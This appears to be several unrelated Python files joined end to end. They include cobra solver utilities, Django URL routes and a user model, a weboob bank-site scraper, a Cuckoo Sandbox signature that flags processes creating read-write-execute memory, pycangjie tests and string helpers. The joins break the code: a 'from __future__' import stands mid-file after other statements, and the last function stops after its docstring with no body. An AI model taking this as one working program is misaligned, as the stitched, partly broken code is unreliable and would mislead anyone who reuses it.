def remove_cons_vars_from_problem(model, what):
    """Remove variables and constraints from a Model's solver object.

    Useful to temporarily take variables and constraints out of a model's
    solver; the removal is reverted when the model context exits.

    Parameters
    ----------
    model : a cobra model
       The model from which to remove the variables and constraints.
    what : list or tuple of optlang variables or constraints.
       The variables or constraints to remove from the model. Must be of
       class `model.problem.Variable` or `model.problem.Constraint`.
    """
    model.solver.remove(what)

    # Register the inverse operation so leaving the model context reverts us.
    context = get_context(model)
    if context:
        context(partial(model.solver.add, what))


def add_absolute_expression(model, expression, name="abs_var", ub=None,
                            difference=0, add=True):
    """Add the absolute value of an expression to the model.

    Also defines a variable for the absolute value that can be used in other
    objectives or constraints.

    Parameters
    ----------
    model : a cobra model
       The model to which to add the absolute expression.
    expression : A sympy expression
       Must be a valid expression within the Model's solver object. The
       absolute value is applied automatically on the expression.
    name : string
       The name of the newly created variable.
    ub : positive float
       The upper bound for the variable.
    difference : positive float
        The difference between the expression and the variable.
    add : bool
        Whether to add the variable to the model at once.

    Returns
    -------
    namedtuple
        A named tuple with variable and two constraints (upper_constraint,
        lower_constraint) describing the new variable and the constraints
        that assign the absolute value of the expression to it.
    """
    Components = namedtuple('Components', ['variable', 'upper_constraint',
                                           'lower_constraint'])
    variable = model.problem.Variable(name, lb=0, ub=ub)
    # The following constraints enforce variable > expression and
    # variable > -expression.
    # Bug fix: the original assignment ended with a stray trailing comma,
    # which wrapped upper_constraint into a 1-tuple instead of a Constraint.
    upper_constraint = model.problem.Constraint(expression - variable,
                                                ub=difference,
                                                name="abs_pos_" + name)
    lower_constraint = model.problem.Constraint(expression + variable,
                                                lb=difference,
                                                name="abs_neg_" + name)
    to_add = Components(variable, upper_constraint, lower_constraint)
    if add:
        add_cons_vars_to_problem(model, to_add)
    return to_add


def fix_objective_as_constraint(model, fraction=1, bound=None,
                                name='fixed_objective_{}'):
    """Fix the current objective as an additional constraint.

    Constraints added to a model (as in pFBA, which minimizes total flux)
    can become too powerful and sacrifice too much of the original
    objective. Fixing the current objective value as a constraint rejects
    solutions with a worse objective value than the original model.

    When done with the model as a context, the modification to the
    objective will be reverted when exiting that context.

    Parameters
    ----------
    model : cobra.Model
        The model to operate on
    fraction : float
        The fraction of the optimum the objective is allowed to reach.
    bound : float, None
        The bound to use instead of fraction of maximum optimal value. If
        not None, fraction is ignored.
    name : str
        Name of the objective. May contain one `{}` placeholder which is
        filled with the name of the old objective.
    """
    constraint_name = name.format(model.objective.name)
    # Replace any previously fixed objective of the same name.
    if constraint_name in model.constraints:
        model.solver.remove(constraint_name)
    if bound is None:
        bound = model.slim_optimize(error_value=None) * fraction
    # For maximization the bound is a floor; for minimization a ceiling.
    if model.objective.direction == 'max':
        lb, ub = bound, None
    else:
        lb, ub = None, bound
    fixed = model.problem.Constraint(
        model.objective.expression,
        name=constraint_name, ub=ub, lb=lb)
    add_cons_vars_to_problem(model, fixed, sloppy=True)


def check_solver_status(status, raise_error=False):
    """Perform standard checks on a solver's status.

    OPTIMAL passes silently; INFEASIBLE merely warns unless ``raise_error``
    is set; ``None`` means no optimization happened yet; anything else is an
    optimization error.
    """
    if status == optlang.interface.OPTIMAL:
        return
    if status == optlang.interface.INFEASIBLE and not raise_error:
        warn("solver status is '{}'".format(status), UserWarning)
        return
    if status is None:
        raise RuntimeError(
            "model was not optimized yet or solver context switched")
    raise OptimizationError("solver status is '{}'".format(status))


def assert_optimal(model, message='optimization failed'):
    """Assert model solver status is optimal.

    Do nothing if model solver status is optimal, otherwise throw
    appropriate exception depending on the status.

    Parameters
    ----------
    model : cobra.Model
        The model to check the solver status for.
    message : str (optional)
        Message to for the exception if solver status was not optimal.
    """
    status = model.solver.status
    if status != optlang.interface.OPTIMAL:
        # Map the solver status onto the matching cobra exception type.
        raise OPTLANG_TO_EXCEPTIONS_DICT[status](message)


import cobra.solvers as legacy_solvers  # noqa

from __future__ import absolute_import
import json

class JSONRenderer:
    """Serializes a mystery object into an indented JSON string."""

    def render(self, mystery):
        """Return the mystery's encoded representation as 4-space-indented JSON."""
        payload = mystery.encode()
        return json.dumps(payload, indent=4)

"""General-use classes to interact with the ApplicationAutoScaling service through CloudFormation.

See Also:
    `AWS developer guide for ApplicationAutoScaling
    <https://docs.aws.amazon.com/autoscaling/application/APIReference/Welcome.html>`_
"""

# noinspection PyUnresolvedReferences
from .._raw import applicationautoscaling as _raw

# noinspection PyUnresolvedReferences
from .._raw.applicationautoscaling import *

#!/usr/bin/env python

import sys, argparse

def main():
    """Parse a "<time> <tx_bytes>" log and print traffic deltas.

    Reads whitespace-delimited samples from the input file, waits until
    transmitted bytes jump by more than 100000 over the baseline (traffic
    detected), then for every later sample prints
    "<seconds since detection> <bytes since detection>".
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input', type=str, action='store',
                        dest='input', default=None, help="Input file")
    args = parser.parse_args()
    if args.input is None:
        # Bug fix: the original (Python 2) code printed the error and then
        # crashed on open(None); fail fast with a nonzero exit instead.
        print("Error: No input file", file=sys.stderr)
        sys.exit(1)
    stats = {}
    with open(args.input) as in_file:
        for line in in_file:
            fields = line.split()
            stats[int(fields[0])] = int(fields[1])
    samples = sorted(stats.items())
    if not samples:
        return  # empty input: nothing to report
    start_time, prev_tx = samples[0]
    no_traffic = True
    for time, tx_bytes in samples:
        if no_traffic:
            # Wait for a >100 kB jump over the baseline before reporting.
            if tx_bytes > prev_tx + 100000:
                no_traffic = False
                start_time, prev_tx = time, tx_bytes
        else:
            print(time - start_time, tx_bytes - prev_tx)
            prev_tx = tx_bytes


if __name__ == "__main__":
    main()

# -*- coding: utf-8 -*-
"""digitalocean API to manage droplets"""

__version__ = "1.16.0"
__author__ = "Lorenzo Setale ( http://who.is.lorenzo.setale.me/? )"
__author_email__ = "lorenzo@setale.me"
__license__ = "LGPL v3"
__copyright__ = "Copyright (c) 2012-2020 Lorenzo Setale"

from .Manager import Manager
from .Droplet import Droplet, DropletError, BadKernelObject, BadSSHKeyFormat
from .Region import Region
from .Size import Size
from .Image import Image
from .Action import Action
from .Account import Account
from .Balance import Balance
from .Domain import Domain
from .Record import Record
from .SSHKey import SSHKey
from .Kernel import Kernel
from .FloatingIP import FloatingIP
from .Volume import Volume
from .baseapi import Error, EndPointError, TokenError, DataReadError, NotFoundError
from .Tag import Tag
from .LoadBalancer import LoadBalancer
from .LoadBalancer import StickySessions, ForwardingRule, HealthCheck
from .Certificate import Certificate
from .Snapshot import Snapshot
from .Project import Project
from .Firewall import Firewall, InboundRule, OutboundRule, Destinations, Sources
from .VPC import VPC

 # Copyright (c) 2010 by Yaco Sistemas <pmartin@yaco.es>
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU Lesser General Public License for more details.
 #
 # You should have received a copy of the GNU Lesser General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.

from django.conf.urls.defaults import patterns, url

# URL routes for the autoreports app, using old-style Django string view
# references (the 'autoreports.views' prefix plus a view name per pattern).
urlpatterns = patterns('autoreports.views',
    # AJAX helpers used by the report designer to fetch the field tree and
    # per-field option widgets.
    url(r'^ajax/fields/tree/$', 'reports_ajax_fields', name='reports_ajax_fields'),
    url(r'^ajax/fields/options/$', 'reports_ajax_fields_options', name='reports_ajax_fields_options'),


    # Report listing (optionally filtered by category), then per-registry-key
    # API, API-list and wizard views; finally a per-app/model report view.
    url(r'^(category/(?P<category_key>[\w-]+)/)?$', 'reports_list', name='reports_list'),
    url(r'^(?P<registry_key>[\w-]+)/$', 'reports_api', name='reports_api'),
    url(r'^(?P<registry_key>[\w-]+)/(?P<report_id>\d+)/$', 'reports_api', name='reports_api'),
    url(r'^(?P<registry_key>[\w-]+)/reports/$', 'reports_api_list', name='reports_api_list'),
    url(r'^(?P<registry_key>[\w-]+)/wizard/$', 'reports_api_wizard', name='reports_api_wizard'),
    url(r'^(?P<registry_key>[\w-]+)/wizard/(?P<report_id>\d+)/$', 'reports_api_wizard', name='reports_api_wizard'),
    url(r'^(?P<app_name>[\w-]+)/(?P<model_name>[\w-]+)/$', 'reports_view', name='reports_view'),
    )

# encoding: utf-8
from __future__ import absolute_import, unicode_literals

from apiview.model import AbstractUserMixin, BaseModel
from django.contrib.auth.base_user import AbstractBaseUser
from django.db import models


class User(AbstractUserMixin, BaseModel, AbstractBaseUser):
    """Example user model stored in the ``example_user`` table."""

    # NOTE(review): plain class attribute, not a model field — every user is
    # treated as non-staff; confirm this is intended (Django admin checks it).
    is_staff = False

    def get_short_name(self):
        # NOTE(review): no ``name`` field is declared on this class —
        # presumably provided by AbstractUserMixin/BaseModel; verify,
        # otherwise this raises AttributeError.
        return self.name

    def get_full_name(self):
        return self.nickname

    USERNAME_FIELD = 'username'
    username = models.CharField('用户名', unique=True, max_length=64, editable=False, null=False, blank=False)
    # NOTE(review): ``unique=True`` on a password hash looks like a bug — it
    # forbids two users sharing a password and leaks information; confirm.
    password = models.CharField('密码', max_length=128, unique=True, editable=False, null=False, blank=True)
    nickname = models.CharField('昵称', unique=True, max_length=64, editable=False, null=False, blank=False)

    class Meta:
        db_table = 'example_user'
        app_label = 'example_app'
        verbose_name = verbose_name_plural = "用户"

# -*- coding: utf-8 -*-

# Copyright(C) 2014      smurail
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals

import re

from weboob.exceptions import BrowserIncorrectPassword
from weboob.browser.pages import HTMLPage, JsonPage, pagination, LoggedPage
from weboob.browser.elements import ListElement, ItemElement, TableElement, method
from weboob.browser.filters.standard import CleanText, CleanDecimal, DateGuesser, Env, Field, Filter, Regexp, Currency, Date
from weboob.browser.filters.html import Link, Attr, TableCell
from weboob.capabilities.bank import Account, Investment
from weboob.capabilities.base import NotAvailable
from weboob.tools.capabilities.bank.transactions import FrenchTransaction
from weboob.tools.compat import urljoin
from weboob.tools.capabilities.bank.investments import is_isin_valid


__all__ = ['LoginPage']


class UselessPage(HTMLPage):
    # Placeholder page: visited during navigation but never scraped.
    pass


class PasswordCreationPage(HTMLPage):
    def get_message(self):
        """Return the password-creation notice: bold lead-in plus plain text."""
        xpath = '//div[@class="bienvenueMdp"]/following-sibling::div'
        lead = CleanText(xpath + '/strong')(self.doc)
        body = CleanText(xpath, children=False)(self.doc)
        return '%s%s' % (lead, body)


class ErrorPage(HTMLPage):
    # Generic error page; matched only so navigation can recognize it.
    pass


class SubscriptionPage(LoggedPage, JsonPage):
    # JSON endpoint reachable only when logged in; no scraping logic needed.
    pass


class LoginPage(HTMLPage):
    # Login form page; the browser fills and submits it elsewhere.
    pass


class CMSOPage(HTMLPage):
    @property
    def logged(self):
        """False when the site reports an interrupted session, True otherwise."""
        interrupted = self.doc.xpath('//b[text()="Session interrompue"]')
        return not interrupted


class AccountsPage(CMSOPage):
    # Maps account label prefixes to weboob account types; labels not listed
    # here resolve to TYPE_UNKNOWN (see Type filter below).
    TYPES = {'COMPTE CHEQUES':               Account.TYPE_CHECKING,
             'COMPTE TITRES':                Account.TYPE_MARKET,
             "ACTIV'EPARGNE":                Account.TYPE_SAVINGS,
             "TRESO'VIV":                    Account.TYPE_SAVINGS,
            }

    @method
    class iter_accounts(ListElement):
        item_xpath = '//div[has-class("groupe-comptes")]//li'

        class item(ItemElement):
            klass = Account

            class Type(Filter):
                # Resolve a label to an account type via the TYPES prefix map.
                def filter(self, label):
                    for pattern, actype in AccountsPage.TYPES.items():
                        if label.startswith(pattern):
                            return actype
                    return Account.TYPE_UNKNOWN

            obj__history_url = Link('.//a[1]')
            obj_id = CleanText('.//span[has-class("numero-compte")]') & Regexp(pattern=r'(\d{3,}[\w]+)', default='')
            obj_label = CleanText('.//span[has-class("libelle")][1]')
            obj_currency = Currency('//span[has-class("montant")]')
            obj_balance = CleanDecimal('.//span[has-class("montant")]', replace_dots=True)
            obj_type = Type(Field('label'))
            # Last numbers replaced with XX... or we have to send sms to get RIB.
            obj_iban = NotAvailable

            # some accounts may appear on multiple areas, but the area where they come from is indicated
            obj__owner = CleanText('(./preceding-sibling::tr[@class="LnMnTiers"])[last()]')

            def validate(self, obj):
                # Fall back to a whitespace-stripped label as the id.
                # NOTE(review): obj_id's Regexp default is '' (not None), so
                # this None check may never trigger — confirm against weboob's
                # Filter semantics.
                if obj.id is None:
                    obj.id = obj.label.replace(' ', '')
                return True

    def on_load(self):
        # The site shows a "technical incident" message when the user has no
        # account on this space; surfaced as a credentials-type error.
        if self.doc.xpath('//p[contains(text(), "incident technique")]'):
            raise BrowserIncorrectPassword("Vous n'avez aucun compte sur cet espace. " \
                                           "Veuillez choisir un autre type de compte.")


class InvestmentPage(CMSOPage):
    def has_error(self):
        # Non-empty text in the error span signals a failed page.
        return CleanText('//span[@id="id_error_msg"]')(self.doc)

    @method
    class iter_accounts(ListElement):
        item_xpath = '//table[@class="Tb" and tr[1][@class="LnTit"]]/tr[@class="LnA" or @class="LnB"]'

        class item(ItemElement):
            klass = Account

            def obj_id(self):
                # Account id is "<area>.<number>" when the preceding section
                # header carries an area id "(NNN)", else just the number.
                area_id = Regexp(CleanText('(./preceding-sibling::tr[@class="LnMnTiers"][1])//span[@class="CelMnTiersT1"]'),
                            r'\((\d+)\)', default='')(self)
                acc_id = Regexp(CleanText('./td[1]'), r'(\d+)\s*(\d+)', r'\1\2')(self)
                if area_id:
                    return '%s.%s' % (area_id, acc_id)
                return acc_id

            def obj__formdata(self):
                # Pull (form name, account index, root id) out of the link's
                # onclick javascript call arguments.
                # NOTE(review): assumes args[0] is "document.<form>", args[2]
                # the index and args[4] a quoted root id — confirm against the
                # live site's markup.
                js = Attr('./td/a[1]', 'onclick', default=None)(self)
                if js is None:
                    return
                args = re.search(r'\((.*)\)', js).group(1).split(',')

                form = args[0].strip().split('.')[1]
                idx = args[2].strip()
                idroot = args[4].strip().replace("'", "")
                return (form, idx, idroot)

            obj_url = Link('./td/a[1]', default=None)

    def go_account(self, form, idx, idroot):
        # Submit the navigation form extracted by obj__formdata to open an
        # account's detail page.
        form = self.get_form(name=form)
        form['indiceCompte'] = idx
        form['idRacine'] = idroot
        form.submit()


class CmsoTableElement(TableElement):
    # Shared table layout: header cells live in the "LnTit" row, data rows
    # alternate between the "LnA" and "LnB" classes.
    head_xpath = '//table[has-class("Tb")]/tr[has-class("LnTit")]/td'
    item_xpath = '//table[has-class("Tb")]/tr[has-class("LnA") or has-class("LnB")]'


class InvestmentAccountPage(CMSOPage):
    @method
    class iter_investments(CmsoTableElement):
        # Column headers as they appear on the site (French labels).
        col_label = 'Valeur'
        col_code = 'Code'
        col_quantity = 'Qté'
        col_unitvalue = 'Cours'
        col_valuation = 'Valorisation'
        col_vdate = 'Date cours'

        class item(ItemElement):
            klass = Investment

            obj_label = CleanText(TableCell('label'))
            obj_quantity = CleanDecimal(TableCell('quantity'), replace_dots=True)
            obj_unitvalue = CleanDecimal(TableCell('unitvalue'), replace_dots=True)
            obj_valuation = CleanDecimal(TableCell('valuation'), replace_dots=True)
            obj_vdate = Date(CleanText(TableCell('vdate')), dayfirst=True, default=NotAvailable)

            def obj_code(self):
                # Cash lines carry no ISIN; other codes are kept only when
                # they validate as ISINs.
                if Field('label')(self) == "LIQUIDITES":
                    return 'XX-liquidity'
                code = CleanText(TableCell('code'))(self)
                return code if is_isin_valid(code) else NotAvailable

            def obj_code_type(self):
                return Investment.CODE_TYPE_ISIN if is_isin_valid(Field('code')(self)) else NotAvailable


class Transaction(FrenchTransaction):
    # Regexes classifying raw CMSO labels into transaction types; first match
    # wins. Named groups (dd/mm/yy, text, category) feed FrenchTransaction.
    PATTERNS = [(re.compile(r'^RET DAB (?P<dd>\d{2})/?(?P<mm>\d{2})(/?(?P<yy>\d{2}))? (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_WITHDRAWAL),
                (re.compile(r'CARTE (?P<dd>\d{2})/(?P<mm>\d{2}) (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_CARD),
                (re.compile(r'^(?P<category>VIR(EMEN)?T? (SEPA)?(RECU|FAVEUR)?)( /FRM)?(?P<text>.*)'),
                                                              FrenchTransaction.TYPE_TRANSFER),
                (re.compile(r'^PRLV (?P<text>.*)( \d+)?$'),    FrenchTransaction.TYPE_ORDER),
                (re.compile(r'^(CHQ|CHEQUE) .*$'),             FrenchTransaction.TYPE_CHECK),
                (re.compile(r'^(AGIOS /|FRAIS) (?P<text>.*)'), FrenchTransaction.TYPE_BANK),
                (re.compile(r'^(CONVENTION \d+ |F )?COTIS(ATION)? (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_BANK),
                (re.compile(r'^REMISE (?P<text>.*)'),          FrenchTransaction.TYPE_DEPOSIT),
                (re.compile(r'^(?P<text>.*)( \d+)? QUITTANCE .*'),
                                                              FrenchTransaction.TYPE_ORDER),
                (re.compile(r'^.* LE (?P<dd>\d{2})/(?P<mm>\d{2})/(?P<yy>\d{2})$'),
                                                              FrenchTransaction.TYPE_UNKNOWN),
                (re.compile(r'^.* PAIEMENT (?P<dd>\d{2})/(?P<mm>\d{2}) (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_UNKNOWN),
               ]


class CmsoTransactionElement(ItemElement):
    klass = Transaction

    def condition(self):
        """Keep rows with at least 5 cells that are not long-label detail rows."""
        if len(self.el) < 5:
            return False
        return not self.el.get('id', '').startswith('libelleLong')


class HistoryPage(CMSOPage):
    def get_date_range_list(self):
        # Available history periods from the date <select> (empty values dropped).
        return [d for d in self.doc.xpath('//select[@name="date"]/option/@value') if d]

    @pagination
    @method
    class iter_history(ListElement):
        item_xpath = '//div[contains(@class, "master-table")]//ul/li'

        def next_page(self):
            pager = self.page.doc.xpath('//div[@class="pager"]')
            if pager:  # more than one page only if there are enough transactions
                assert len(pager) == 1

                next_links = pager[0].xpath('./span/following-sibling::a[@class="page"]')
                if next_links:
                    url_next_page = Link('.')(next_links[0])
                    url_next_page = urljoin(self.page.url, url_next_page)
                    return self.page.browser.build_request(url_next_page)

        class item(CmsoTransactionElement):

            # Helper evaluated at class-body time: builds a date filter that
            # guesses the year from "<weekday> dd/mm", falling back to the
            # standard Transaction.Date parser.
            def date(selector):
                return DateGuesser(Regexp(CleanText(selector), r'\w+ (\d{2}/\d{2})'), Env('date_guesser')) | Transaction.Date(selector)

            # CAUTION: this website write a 'Date valeur' inside a div with a class == 'c-ope'
            # and a 'Date opération' inside a div with a class == 'c-val'
            # so actually i assume 'c-val' class is the real operation date and 'c-ope' is value date
            obj_date = date('./div[contains(@class, "c-val")]')
            obj_vdate = date('./div[contains(@class, "c-ope")]')
            obj_raw = Transaction.Raw(Regexp(CleanText('./div[contains(@class, "c-libelle-long")]'), r'Libellé étendu (.+)'))
            obj_amount = Transaction.Amount('./div[contains(@class, "c-credit")]', './div[contains(@class, "c-debit")]')


class UpdateTokenMixin(object):
    def on_load(self):
        """Refresh the browser token from the 'Authentication' response header."""
        headers = self.response.headers
        if 'Authentication' in headers:
            # Header looks like "<scheme> ... <token>"; keep the last word.
            self.browser.token = headers['Authentication'].split(' ')[-1]


class SSODomiPage(JsonPage, UpdateTokenMixin):
    def get_sso_url(self):
        # The JSON payload carries the SSO redirect target under 'urlSSO'.
        return self.doc['urlSSO']


class AuthCheckUser(HTMLPage):
    # Intermediate authentication-check page; nothing to scrape.
    pass


# Copyright (C) 2014 Optiv, Inc. (brad.spengler@optiv.com)
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.

from lib.cuckoo.common.abstracts import Signature

class InjectionRWX(Signature):
    """Flags processes that create PAGE_EXECUTE_READWRITE memory regions."""

    name = "injection_rwx"
    description = "Creates RWX memory"
    severity = 2
    confidence = 50
    categories = ["injection"]
    authors = ["Optiv"]
    minimum = "1.2"
    evented = True

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)

    filter_apinames = set(["NtAllocateVirtualMemory", "NtProtectVirtualMemory", "VirtualProtectEx"])
    filter_analysistypes = set(["file"])

    def on_call(self, call, process):
        """Trigger when a call requests protection 0x40 (PAGE_EXECUTE_READWRITE)."""
        api = call["api"]
        if api in ("NtAllocateVirtualMemory", "VirtualProtectEx"):
            arg_name = "Protection"
        elif api == "NtProtectVirtualMemory":
            arg_name = "NewAccessProtection"
        else:
            return
        # PAGE_EXECUTE_READWRITE
        if self.get_argument(call, arg_name) == "0x00000040":
            return True

# Copyright (c) 2013 - The pycangjie authors
#
# This file is part of pycangjie, the Python bindings to libcangjie.
#
# pycangjie is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pycangjie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pycangjie.  If not, see <http://www.gnu.org/licenses/>.


import itertools
import operator
import string
import subprocess
import unittest

import cangjie


class MetaTest(type):
    """Metaclass that equips every test class with per-code test methods.

    Ideally each TestCase would get one method per potential Cangjie input
    code, but enumerating all 1-to-5-letter lowercase strings would mean
    12356630 methods and exhausts memory. Instead we lean on libcangjie's
    wildcard support and only generate the 26 single-letter codes plus the
    26^2 two-letter wildcard codes ("a*b", ...), i.e. 702 methods.
    """
    def __init__(cls, name, bases, dct):
        super(MetaTest, cls).__init__(name, bases, dct)

        def make_test(code):
            # Bind `code` now to avoid the late-binding closure pitfall.
            def run(self):
                return self.run_test(code)
            return run

        # 26 single-letter codes: test_a ... test_z
        for letter in string.ascii_lowercase:
            setattr(cls, "test_%s" % letter, make_test(letter))

        # 676 wildcard codes "x*y", exposed as test_xy
        for pair in itertools.product(string.ascii_lowercase, repeat=2):
            code = "*".join(pair)
            setattr(cls, "test_%s" % code.replace("*", ""), make_test(code))


class BaseTestCase(unittest.TestCase):
    """Base test class, grouping the common stuff for all our unit tests"""
    def __init__(self, name):
        super().__init__(name)

        # NOTE(review): self.cli_options (and self.version used in setUp) are
        # expected to be provided by subclasses — confirm.
        self.cli_cmd = ["/usr/bin/libcangjie_cli"] + self.cli_options

        # Enable every character filter so reference and wrapper results match.
        self.language = (cangjie.filters.BIG5 | cangjie.filters.HKSCS |
                         cangjie.filters.PUNCTUATION |
                         cangjie.filters.CHINESE |
                         cangjie.filters.ZHUYIN | cangjie.filters.KANJI |
                         cangjie.filters.KATAKANA |
                         cangjie.filters.HIRAGANA |
                         cangjie.filters.SYMBOLS)

    def setUp(self):
        # Fresh Cangjie instance per test.
        self.cj = cangjie.Cangjie(self.version, self.language)

    def tearDown(self):
        del self.cj

    def run_command(self, cmd):
        """Run a command, deal with errors, and return its stdout"""
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        out, err = proc.communicate()

        try:
            cangjie.errors.handle_error_code(proc.returncode,
                                             msg="Unknown error while running"
                                                 " libcangjie_cli (%d)"
                                                 % proc.returncode)

        except cangjie.errors.CangjieNoCharsError:
            # "No chars" is a valid outcome, not an error: empty output.
            return ""

        try:
            return out.decode("utf-8")

        except UnicodeDecodeError:
            # Python's 'utf-8' codec trips over b"\xed\xa1\x9d\xed\xbc\xb2",
            # but according to [1] and [2], it is a valid sequence of 2 chars:
            #     U+D85D    \xed\xa1\x9d
            #     U+DF32    \xed\xbc\xb2
            # [1] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=55389&utf8=string-literal
            # [2] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=57138&utf8=string-literal
            # TODO: Investigate this further, and eventually open a bug report
            out2 = []
            for line in out.split("\n".encode("utf-8")):
                try:
                    out2.append(line.decode("utf-8"))
                except UnicodeDecodeError:
                    # Drop lines that still fail to decode.
                    pass
            return "\n".join(out2)

    def run_test(self, input_code):
        """Run the actual test

        This compares the output of the libcangjie_cli tool with the output
        from pycangjie.

        The idea is that if pycangjie produces the same results as a C++ tool
        compiled against libcangjie, then pycangjie properly wraps libcangjie.

        We do not try to verify that pycangjie produces valid results here,
        validity is to be checked in libcangjie.

        Note that this whole test is based on scraping the output of
        libcangjie_cli, which is quite fragile.
        """
        # Get a list of CangjieChar from libcangjie_cli as a reference
        tmp_expected = self.run_command(self.cli_cmd+[input_code]).split("\n")
        tmp_expected = map(lambda x: x.strip(" \n"), tmp_expected)
        tmp_expected = filter(lambda x: len(x) > 0, tmp_expected)

        expected = []
        for item in tmp_expected:
            # Each line looks like "chchar: 'X', simpchar: 'Y', code: 'Z', frequency N"
            chchar, simpchar, code, frequency = item.split(", ")

            chchar = chchar.split(": ")[-1].strip("'")
            simpchar = simpchar.split(": ")[-1].strip("'")
            code = code.split(": ")[-1].strip("'")
            frequency = int(frequency.split(" ")[-1])

            expected.append(cangjie._core.CangjieChar(chchar.encode("utf-8"),
                                                      simpchar.encode("utf-8"),
                                                      code.encode("utf-8"),
                                                      frequency))

        expected = sorted(expected, key=operator.attrgetter('chchar', 'code'))

        try:
            # And compare with what pycangjie produces
            results = sorted(self.cj.get_characters(input_code),
                             key=operator.attrgetter('chchar', 'code'))

            self.assertEqual(results, expected)

        except cangjie.errors.CangjieNoCharsError:
            # If pycangjie found nothing, the reference must be empty too.
            self.assertEqual(len(expected), 0)

# -*- coding: utf-8 -*-
"""
This module contains general-purpose utility functions.
"""
__author__ = "Jiang Yu-Kuan <yukuan.jiang@gmail.com>"
__date__ = "2016/02/08 (initial version) ~ 2019/04/17 (last revision)"

import ast
import io
import os
import re
import sys


#------------------------------------------------------------------------------
# File
#------------------------------------------------------------------------------

def save_utf8_file(fn, lines):
    """Save string lines into a UTF-8 encoded text file.

    Arguments
    ---------
    fn -- path of the output file
    lines -- iterable of text lines (written joined by '\n', no
             trailing newline)

    Bug fix: the old code wrote `str.encode(...)` bytes into a file
    opened in text mode, which raises TypeError on Python 3.  io.open
    handles the UTF-8 encoding itself and works on both Python 2 and 3.
    """
    with io.open(fn, "w", encoding="utf-8") as out_file:
        out_file.write(u"\n".join(lines))


def main_basename(path):
    """Return the main name (basename with its extension removed) of a
    given file path.

    Bug fix: the old doctest claimed the result keeps the extension
    ('MsgID.h'); the function strips it via os.path.splitext.  The
    example also used backslashes, which os.path.basename does not
    split on POSIX systems.

    Example
    -------
    >>> main_basename('c:/code/langconv/MsgID.h')
    'MsgID'
    """
    base = os.path.basename(path)
    base_main, _base_ext = os.path.splitext(base)
    return base_main


#------------------------------------------------------------------------------
# Math
#------------------------------------------------------------------------------

def is_numeric(str):
    """Return True if the given string represents a numeric literal.

    Security fix: the old code ran eval() on the string, which executes
    arbitrary code; ast.literal_eval only parses Python literals.  The
    parameter keeps its original (builtin-shadowing) name so existing
    keyword callers are unaffected.
    """
    try:
        # int() rejects non-numeric literals (e.g. parsed strings/lists).
        _offset = int(ast.literal_eval(str))
    except Exception:  # narrow from the old bare except: let SystemExit/KeyboardInterrupt through
        return False
    return True


#------------------------------------------------------------------------------
# String
#------------------------------------------------------------------------------

def replace_chars(text, replaced_pairs='', deleted_chars=''):
    """Return the text with characters substituted and removed.

    Arguments
    ---------
    text -- the input text
    replaced_pairs -- iterable of (old, new) character pairs
    deleted_chars -- characters to drop entirely

    Example
    -------
    >>> replaced = [('a','b'), ('c','d')]
    >>> removed = 'e'
    >>> replace_chars('abcde', replaced, removed)
    'bbdd'
    """
    result = text
    for old_ch, new_ch in replaced_pairs:
        result = result.replace(old_ch, new_ch)
    for unwanted in deleted_chars:
        result = result.replace(unwanted, '')
    return result


def camel_case(string):
    """Return a CamelCase string built from a space-separated string.

    Example
    -------
    >>> camel_case('good job')
    'GoodJob'
    """
    capitalized = [word.capitalize() for word in string.split()]
    return ''.join(capitalized)


def replace_punctuations(text):
    """Replace punctuation characters with letter abbreviations and
    drop arithmetic/bracket symbols from a string.
    """
    # punctuation -> abbreviation: Q question mark, P period, E
    # exclamation mark, SQ/DQ single/double quote, LP/RP left/right
    # parenthesis, Cn colon, Ca comma, S semicolon
    abbreviations = (
        ('?', 'Q'),
        ('.', 'P'),
        ('!', 'E'),
        ("'", 'SQ'),
        ('"', 'DQ'),
        ('(', 'LP'),
        (')', 'RP'),
        (':', 'Cn'),
        (',', 'Ca'),
        (';', 'S'),
    )
    dropped = '+-*/^=%$#@|\\<>{}[]'
    return replace_chars(text, abbreviations, dropped)


def remain_alnum(text):
    """Keep only the digits and English letters of a string.

    Characters must be alphanumeric AND fall in the ASCII range
    space..'z', which excludes non-Latin alphanumerics.
    """
    kept = [ch for ch in text
            if ch.isalnum() and ord(' ') <= ord(ch) <= ord('z')]
    return ''.join(kept)


#------------------------------------------------------------------------------
# For code generation
#------------------------------------------------------------------------------

def c_identifier(text):
    """Convert input text into a legal identifier in C.

    Space-separated words are CamelCased; '+N'/'-N' numeric prefixes
    become 'PN'/'NN'; punctuation is abbreviated via
    replace_punctuations and everything non-alphanumeric is dropped.

    Example
    -------
    >>> c_identifier("Hello World")
    'HelloWorld'
    >>> c_identifier("Anti-Shake")
    'AntiShake'
    """
